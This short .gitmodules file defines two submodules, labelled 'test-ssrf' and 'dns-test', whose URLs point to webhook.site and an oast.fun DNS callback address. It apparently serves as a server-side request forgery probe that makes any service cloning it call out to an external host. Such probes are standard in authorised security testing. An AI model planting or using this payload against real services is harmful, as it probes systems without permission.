[submodule "test-ssrf"]
	path = test-ssrf
	url = https://webhook.site/e5b582af-85d3-45c7-87a1-4adee0b98905/git-submodule-test
[submodule "dns-test"]
	path = dns-test
	url = https://e5b582af-85d3-45c7-87a1-4adee0b98905.dns-callback.oast.fun
